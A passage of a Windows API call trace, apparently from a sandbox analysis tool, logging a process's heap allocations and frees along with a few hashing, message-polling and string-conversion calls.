0x29f6f80 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0088.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0088.358] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2aae878 [0088.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0088.360] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0088.361] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0088.361] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.361] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0088.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71b38 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0088.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0088.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0088.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0088.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0088.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0088.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0088.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.363] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0088.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69670 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0088.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0088.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69730 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) 